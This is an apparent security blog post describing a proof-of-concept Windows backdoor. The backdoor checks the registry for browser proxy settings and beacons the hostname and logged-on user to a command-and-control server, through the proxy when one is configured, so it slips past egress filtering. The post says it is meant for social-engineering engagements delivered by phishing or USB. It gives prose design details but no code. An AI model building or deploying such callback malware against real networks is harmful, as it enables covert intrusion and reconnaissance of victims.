Proxy Detecting Callback Backdoor POC

Here’s the scenario:
You send a target a backdoor through whatever means you want; phishing email, USB stick, whatever. If the network is like most environments today they are not restricting outbound requests on standard ports like 80 or 443 and thus our backdoor calls home on these ports and we have a connection inside the candy shell. However if the target is doing what they should and firewall off most (all) outbound tcp ports from user subnets and require those users to go through web proxies for outbound requests then our backdoor would simply fail.

Solution: Our backdoor needs to detect whether the user’s browser is configured to use a proxy server and if so call back to our HTTP command and control server through that proxy.

Implementation: I’m not really giving this project a name because in it’s current state it’s just a very simple proof of concept and only reports whether the program was run.  We find ourselves doing these lightweight style social engineering engagements where we don’t necessarily need to penetrate a client further, all we want to know is if end users are doing things they shouldn’t (like clicking malicious links or plugging in unauthorized USB devices).  The code is pretty damn ugly but if I integrate this into my full blown rootkit/backdoor I’ll clean it up.  I don’t have plans to release my rootkit, but if anyone is interested in checking it out you can email me.

The only thing you need to get this POC functioning for you is to upload report.php to a web server and then change the destination email address in report.php to receive the alerts.  Then change the two DEFINEs in main.c for the POC to point to this webserver (server host and tcp port).  The POC first checks for the presence of a proxy server by querying the registry key HKLM\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Internet Settings\ProxyEnable.  If ProxyEnable is set to 1 it then checks for the proxy configuration in ProxyServer.   The POC then reports back to our HTTP server sending the workstation name and currently logged on user in an HTTP GET request.  The php script (report.php) then takes these and emails them to us.

If no proxy is detected the backdoor directly connects to the defined server to issue the GET request and we receive the email as expected.  You can download the source code and report.php file from here.

Limitations: The only real limitation I can think right now is if the organization isn’t using Internet Explorer and the proxy settings are stored somewhere else.  This is definitely possible but I doubt a business environment would not also include proxy settings for Internet Explorer, for obvious reasons.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: